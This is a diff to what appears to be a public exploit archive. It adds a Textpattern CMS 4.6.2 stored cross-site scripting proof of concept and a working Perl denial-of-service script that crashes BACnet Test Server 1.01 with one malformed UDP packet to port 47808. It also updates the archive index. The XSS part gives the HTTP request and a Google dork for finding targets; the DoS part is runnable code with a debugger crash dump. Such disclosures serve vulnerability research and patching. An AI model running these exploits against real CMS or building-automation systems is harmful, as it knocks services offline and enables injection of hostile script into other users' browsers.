diff --git a/exploits/php/webapps/48861.txt b/exploits/php/webapps/48861.txt new file mode 100644 index 000000000..024e60237 --- /dev/null +++ b/exploits/php/webapps/48861.txt @@ -0,0 +1,51 @@ +# Exploit Title: Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting +# Exploit Author: Alperen Ergel +# Web Site: https://alperenae.gitbook.io/ +# Software Homepage: https://textpattern.com/ +# Version : 4.6.2 +# Tested on: windows 10 / xammp +# Category: WebApp +# Google Dork: intext:"Published with Textpattern CMS" +# Date: 2020-10-29 +# CVE :- +######## Description ######## +# +# 1-) Loggin administrator page +# +# 2-) Write new blog add payload to 'body' +# +# 3-) Back to web site then will be work payload +# +# +######## Proof of Concept ######## + +========>>> REQUEST <<<========= + +POST /textpattern/textpattern/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://localhost/textpattern/textpattern/index.php?event=article&ID=3 +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------127132438115577379281797109093 +Content-Length: 6080 +Connection: close +Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40; __atuvs=5f77129c504c17ce000 + +### SNIPPP HERE #### + +-----------------------------127132438115577379281797109093 +Content-Disposition: form-data; name="Title" + +XSS +-----------------------------127132438115577379281797109093 +Content-Disposition: form-data; name="textile_body" + +1 +-----------------------------127132438115577379281797109093 +Content-Disposition: form-data; name="Body" + + +-----------------------------127132438115577379281797109093 \ No newline at end of file diff --git a/exploits/windows/dos/48860.txt b/exploits/windows/dos/48860.txt new file mode 100644 index 000000000..f2f655322 --- /dev/null +++ b/exploits/windows/dos/48860.txt @@ -0,0 +1,113 @@ +# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC) +# Date: 2020-10-07 +# Author: LiquidWorm +# Vendor: https://www.bac-test.com +# Product link: https://sourceforge.com/projects/bacnetserver +# CVE: N/A + + +#!/usr/bin/perl +# +# BACnet Test Server 1.01 Remote Denial of Service Exploit +# +# +# Vendor: BACnet Interoperability Test Services, Inc. +# Product web page: https://www.bac-test.com +# https://sourceforge.com/projects/bacnetserver +# Affected version: 1.01 (BACnet Stack Version 0.5.7) +# +# Summary: This is a simple BACnet Server aimed at developers who +# want to explore or test their BACnet Client implementations of +# the ASHRAE BACnet protocol. It is based on Steve Karg's fine +# implementation of the BACnet Stack. +# +# Desc: The BACNet Test Server is vulnerable to a denial of service +# (DoS) vulnerability when sending malformed BVLC Length UDP packet +# to port 47808 causing the application to crash. +# +# Type - 0x81 +# BVLC Function +# - 0x01 - Write Broadcast Distribution Table +# - 0x02 - Read Broadcast Distribution Table +# - 0x03 - Read Broadcast Distribution Table ACK +# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header +# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds +# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router. +# Optional Originating Device IP address and Port NOT included in BVLL header. +# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks. +# - 0x0c - Secure-BVLL +# - BVLL Length +# - IP address of Originating Device - optional depending on BVLC Function Code +# - Port number of Originating Device - optional depending on BVLC Function Code +# - NPDU - Network Layer Protocol Data Unit +# +# ================================================================= +# (67c.2f34): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe +# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00 +# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +# Server+0x34313: +# 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=?? +# 0:000> d 994313 +77 +# 0099438a cccccccc +# 0099438e cccccccc +# 00994392 cccccccc +# 00994396 cccccccc +# 0099439a cccccccc +# 0:000> d esp +# 005fec04 005ff3f8 +# 005fec08 005ff408 +# 005fec0c 00692000 +# 005fec10 cccccccc +# 005fec14 cccccccc +# 004fec18 cccccccc +# ================================================================= +# +# Tested on: Microsoft Windows 10 Professional (EN) +# Microsoft Windows 7 Professional SP1 (EN) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5597 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php +# +# +# 05.08.2019 +# + +use strict; +use warnings; +use IO::Socket::INET; + +my $target = "10.0.99.34"; +my $porta = 47808; +my $proto = "udp"; +my $stype = SOCK_DGRAM; +my $timeout = 1; + +my $socket = new IO::Socket::INET ( +PeerHost => $target, +PeerPort => $porta, +Proto => $proto, +Type => $stype, +Timeout => $timeout +) or die "Socket error. : $!\n"; + +print "Connected to: $target:$porta\n"; + +$| = 1; +binmode $socket; + +my $data = "\x81\x09\xFF\xFE"; + +print "Sending: $data [ ".length($data)." bytes ]\n"; +send ($socket, $data, 0) or die "Nope: $!\n"; +print "Done.\n"; + +$socket->close(); \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f80481f53..4a039ca57 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5792,6 +5792,7 @@ id,file,description,date,author,type,platform,port 42781,exploits/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",dos,multiple, 42782,exploits/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",dos,multiple, 42783,exploits/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",dos,multiple, +48860,exploits/windows/dos/48860.txt,"BACnet Test Server 1.01 - Remote Denial of Service (PoC)",2020-10-07,LiquidWorm,dos,windows, 42917,exploits/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",dos,windows, 42920,exploits/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,dos,windows, 42932,exploits/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",dos,linux, @@ -40678,6 +40679,7 @@ id,file,description,date,author,type,platform,port 48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php, 48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware, 48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json, +48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,